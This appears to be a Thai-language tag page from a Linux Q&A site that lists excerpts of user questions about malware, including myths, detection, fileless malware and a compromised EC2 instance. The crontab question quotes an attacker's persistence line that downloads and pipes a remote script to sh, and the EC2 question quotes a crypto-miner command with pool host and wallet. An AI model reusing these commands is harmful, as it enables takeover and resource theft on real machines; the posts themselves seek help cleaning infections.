คำถามติดแท็ก malware

9
ตำนานเกี่ยวกับมัลแวร์ใน Unix / Linux
เป็นไปได้ไหมที่กล่อง Linux ของฉันจะติดมัลแวร์? ฉันไม่เคยได้ยินเรื่องนี้เกิดขึ้นกับคนที่ฉันรู้จักและฉันได้ยินมาหลายครั้งแล้วว่ามันเป็นไปไม่ได้ มันเป็นเรื่องจริงเหรอ? ถ้าเป็นเช่นนั้นจะเกิดอะไรขึ้นกับซอฟต์แวร์ Linux Anti-Virus (ความปลอดภัย)
142 security  malware 

2
รายการ crontab ที่น่าสงสัยที่เรียกใช้ 'xribfa4' ทุก 15 นาที
ฉันต้องการเพิ่มบางอย่างลงในไฟล์ root crontab ของฉันใน Raspberry Pi ของฉันและพบรายการที่น่าสงสัยสำหรับฉันการค้นหาบางส่วนของมันบน Google ไม่ได้ทำอะไรเลย รายการ Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh เนื้อหาของhttp://103.219.112.66:8000/i.shคือ: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) …
58 security  cron  malware 

8
มัลแวร์ที่เรียกใช้โดยผู้ใช้ที่ไม่มีสิทธิ์ของผู้ดูแลระบบหรือ sudo เป็นอันตรายต่อระบบของฉันหรือไม่? [ปิด]
หลังจากหยุดพักการทำงานของเครื่องลีนุกซ์เมื่อเร็ว ๆ นี้ฉันพบไฟล์ปฏิบัติการในโฟลเดอร์โฮมของผู้ใช้ที่มีรหัสผ่านไม่รัดกุม ฉันทำความสะอาดสิ่งที่ดูเหมือนจะเป็นความเสียหายทั้งหมด แต่ฉันกำลังเตรียมการเช็ดแบบเต็มเพื่อให้แน่ใจ มัลแวร์ที่ดำเนินการโดยผู้ใช้ที่ไม่ใช่ sudo หรือผู้ด้อยโอกาสสามารถทำอะไรได้บ้าง มันเป็นเพียงการมองหาไฟล์ที่ทำเครื่องหมายด้วยการอนุญาตให้โลกเขียนเพื่อติดไวรัส? ผู้ใช้ที่ไม่ใช่ผู้ดูแลระบบสามารถทำสิ่งที่คุกคามในระบบ Linux ส่วนใหญ่ได้อย่างไร คุณสามารถให้ตัวอย่างของปัญหาในโลกแห่งความจริงการละเมิดความปลอดภัยประเภทนี้อาจทำให้เกิด?
30 security  malware 

2
ฉันจะฆ่ามัลแวร์ที่น่าสนใจบนอินสแตนซ์ AWS EC2 ได้อย่างไร (เซิร์ฟเวอร์ที่ถูกบุกรุก)
ฉันพบมัลแวร์บนอินสแตนซ์ ec2 ของฉันซึ่งขุด bitcoin อย่างต่อเนื่องและใช้พลังการประมวลผลของฉัน ฉันระบุกระบวนการได้สำเร็จ แต่ไม่สามารถลบและฆ่าได้ ฉันรันคำสั่งนี้ watch "ps aux | sort -nrk 3,3 | head -n 5" มันแสดงกระบวนการห้าอันดับแรกที่ทำงานบนอินสแตนซ์ของฉันซึ่งฉันพบว่ามีชื่อกระบวนการ ' bashd ' ซึ่งกินซีพียู 30% กระบวนการนี้เป็น bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x ฉันฆ่ากระบวนการนี้โดยใช้kill -9 process_idคำสั่ง หลังจาก 5 วินาทีกระบวนการเริ่มต้นอีกครั้ง
26 linux  process  kill  malware 

5
การติดตั้งและใช้ Wine เปิดแพลตฟอร์ม Linux ของคุณให้เป็นไวรัส Windows หรือไม่
เพียงแค่สงสัยว่าการติดตั้ง Wine อาจเปิดลินุกซ์เดสก์ท็อปที่แข็งแกร่งพอสมควรสำหรับโลกแห่งไวรัส Windows มีการยืนยันรายงานเกี่ยวกับเรื่องนั้นไหม? คุณจะติดตั้งผลิตภัณฑ์ป้องกันไวรัส Windows ภายใต้ Wine หรือไม่

4
จะตรวจจับและลบโทรจัน Linux ได้อย่างไร
เมื่อเร็ว ๆ นี้ฉันเพิ่งพบสิ่งนี้: Linux Trojan ไม่ลงความเห็นเป็นเวลาเกือบหนึ่งปี (Unreal IRCd) ใช่ฉันรู้ว่าการเพิ่ม PPA / ซอฟต์แวร์แบบสุ่มจากแหล่งที่ไม่น่าเชื่อถือกำลังขอให้มีปัญหา (หรือแย่กว่านั้น) ฉันไม่เคยทำแบบนั้น แต่หลายคนทำ (บล็อกและแท็บลอยด์จำนวนมากของ Linux ส่งเสริมการเพิ่ม PPA สำหรับแอปแฟนซีโดยไม่มีการเตือนว่ามันอาจทำให้ระบบของคุณแย่ลงหรือแย่ลงกว่าเดิม ม้าโทรจันหรือแอปพลิเคชัน / สคริปต์สามารถตรวจพบและลบออกได้อย่างไร
16 security  malware 

1
จะทราบได้อย่างไรว่าโปรแกรมลึกลับในรายการ nethogs เป็นมัลแวร์?
นี่คือสิ่งที่ฉันเห็นใน Nethogs: ฉันกังวลเกี่ยวกับรายชื่อที่มี PID วิ่ง? rootฉันจะค้นหาสิ่งเหล่านี้ได้อย่างไร ฉันใช้ Linux Mint 14 โปรดแจ้งให้ฉันทราบว่าควรรวมข้อมูลอื่นใด

2
มัลแวร์ที่ไม่มีลวดลายทำงานบน linux อย่างไร
ฉันเข้าใจคำจำกัดความของมัลแวร์ไร้สาระ: รหัสที่เป็นอันตรายที่ไม่ได้ใช้ไฟล์ แต่มีอยู่ในหน่วยความจำเท่านั้น…โดยเฉพาะอย่างยิ่งรหัสที่เป็นอันตรายแบบไม่ใส่ข้อมูล ... ผนวกตัวเองเข้ากับกระบวนการที่ทำงานอยู่ในหน่วยความจำ ... ใครช่วยอธิบายหน่อยได้ไหมว่าการผนวกตัวเองเข้ากับกระบวนการที่ทำงานอยู่ในหน่วยความจำได้อย่างไร นอกจากนี้การป้องกัน / การทำให้แข็งตัวคืออะไร
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.